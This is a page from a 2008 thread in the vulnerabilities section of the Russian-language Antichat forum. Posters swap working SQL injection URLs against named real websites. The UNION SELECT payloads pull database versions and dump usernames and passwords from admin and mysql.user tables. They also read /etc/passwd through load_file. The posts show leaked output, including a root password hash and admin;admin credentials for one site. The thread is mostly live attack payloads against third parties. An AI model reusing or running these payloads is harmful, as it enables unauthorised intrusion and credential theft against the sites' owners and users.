ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5971  
Старый 11.07.2008, 20:05
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Eicta.org - PR 6
Цитата:
http://www.eicta.org/index.php?id=32&id_article=-1+union+select+unhex(hex(concat_ws(0x3a3a,0x3a3a,v ersion(),0x3a3a))),2,3,4,5,6,7,8,9,10,11,12/*
 
Ответить с цитированием

  #5972  
Старый 11.07.2008, 21:39
Аватар для DDoSька
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию

http://nsastutter.org/subcat/index.php?subid=-1+union+select+1,version(),3,4,5+users/*
4.0.25-standard-log
к users так ии не смог ничего подобрать...
 
Ответить с цитированием

  #5973  
Старый 11.07.2008, 23:41
Аватар для ~!DoK_tOR!~
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

Цитата:
Сообщение от DDoSька  
http://nsastutter.org/subcat/index.php?subid=-1+union+select+1,version(),3,4,5+users/*
4.0.25-standard-log
к users так ии не смог ничего подобрать...
\\

Цитата:
http://nsastutter.org/subcat/index.php?subid=-1+union+select+1,concat_ws(0x3a,name,password),3,4 ,5+from+admin/*
 
Ответить с цитированием

  #5974  
Старый 12.07.2008, 11:09
Аватар для BanQui
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию

http://www.laptopshowcase.co.uk/downloads.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/* чтото странное он пишет!

Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause
 
Ответить с цитированием

  #5975  
Старый 12.07.2008, 11:19
Аватар для BanQui
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию

http://hyundai-trex.ru/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25/*

Вот еще!!! Хз,но раскрутить не получилось!
 
Ответить с цитированием

  #5976  
Старый 12.07.2008, 11:43
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.laptopshowcase.co.uk/downloads.php?id=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion())/*

Database Version: 4.0.23-standard
Database name: laptops_main
User name: laptops_main@localhost

2 BanQui вот тебе твоя скуля....

таблицы подобрать не смог.. результат смотрим в хедере


во 2-й походу слепая скуля...не стал подзапросами мучать если сильно надо сам добьёшь

Последний раз редактировалось Gorev; 12.07.2008 в 11:47..
 
Ответить с цитированием

  #5977  
Старый 12.07.2008, 13:19
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Glaad.org - PR 7
Цитата:
http://www.glaad.org/media/resource_kit_detail.php?id=999999+union+select+1,2 ,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18, 19,20--
4 версия. но есть права )
Цитата:
http://www.glaad.org/media/resource_kit_detail.php?id=999999+union+select+1,2 ,3,4,5,concat_ws(0x3a,user,password),7,8,9,10,11,1 2,13,14,15,16,17,18,19,20+from+mysql.user--
и так..
Цитата:
http://www.glaad.org/media/resource_kit_detail.php?id=999999+union+select+1,2 ,3,4,5,load_file(0x2F6574632F706173737764),7,8,9,1 0,11,12,13,14,15,16,17,18,19,20-_
не пробвал шелл заливать.. думаю фильтирует кавычки...

Onthecommons.org - PR 6
Цитата:
http://onthecommons.org/content.php?id=99999'+union+select+concat_ws(0x3a, username,password)+from+onthec5_main.users+limit+0 ,1/*
http://onthecommons.org/login.php
admin;admin

Clasp.org - PR 6
Цитата:
http://www.clasp.org/publications.php?id=999999+UNION+SELECT+1,2,concat _ws(0x3a,version(),user(),database()),4,5,6,7,8,9, 10,11,12,13,14,15/*
TurkishCulturalFoundation.org - PR 5
Цитата:
http://www.turkishculturalfoundation.org/pages.php?ID=999999'+union+select+unhex(hex(concat _ws(0x3a,version(),table_name)))+from+information_ schema.tables+limit+26,1/*
Agsafe.com.au - PR 4
Цитата:
http://www.agsafe.com.au/guardian/content.php?id=9999999+union+select+1,2,unhex(hex( version())),4,5,6,7,8,9,10,11,12,13,14/*

Последний раз редактировалось sabe; 13.07.2008 в 08:39..
 
Ответить с цитированием

  #5978  
Старый 12.07.2008, 23:09
Аватар для Calcutta
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

http://www.tutorialsuche.de/tutorials.php?c=9+union+select+concat_ws(0x3a,data base(),user(),version()),2,3--
листаем вниз, наводим мышку на "2", с адреса ссылки выдераем:
utorialsuche:root@localhost:4.1.11-Debian_4sarge7-log

пытался дальше копнуть через "table_name)+from+information_ schema.tables+limit+1,1--", не получилось. может кто разберется ; )

и еще кое что: http://www.tutorialsuche.de/tutorials.php?c=9+union+select+load_file(0x2F65746 32F706173737764),2,3--
 
Ответить с цитированием

  #5979  
Старый 13.07.2008, 00:51
Аватар для ~!DoK_tOR!~
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

Цитата:
Сообщение от Calcutta  
http://www.tutorialsuche.de/tutorials.php?c=9+union+select+concat_ws(0x3a,data base(),user(),version()),2,3--
листаем вниз, наводим мышку на "2", с адреса ссылки выдераем:
utorialsuche:root@localhost:4.1.11-Debian_4sarge7-log

пытался дальше копнуть через "table_name)+from+information_ schema.tables+limit+1,1--", не получилось. может кто разберется ; )

и еще кое что: http://www.tutorialsuche.de/tutorials.php?c=9+union+select+load_file(0x2F65746 32F706173737764),2,3--
Цитата:
пытался дальше копнуть через "table_name)+from+information_ schema.tables+limit+1,1--", не получилось. может кто разберется ; )
это версия 4 а не 5 information_ schema.tables есть только в 5 ветке )

Цитата:
http://www.tutorialsuche.de/tutorials.php?c=9+union+select+concat_ws(0x3a,user ,password),2,3+from+mysql.user--
root:5ce0cb356302dfa5

Последний раз редактировалось ~!DoK_tOR!~; 13.07.2008 в 00:56..
 
Ответить с цитированием

  #5980  
Старый 13.07.2008, 02:29
Аватар для Zedi
Zedi
Постоянный
Регистрация: 06.06.2007
Сообщений: 335
Провел на форуме:
1487377

Репутация: 392
Отправить сообщение для Zedi с помощью ICQ
По умолчанию

http://inforos.ru/?id=11041 точно не знаю но мне кажется этот сайт сплошная инъекцияя
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ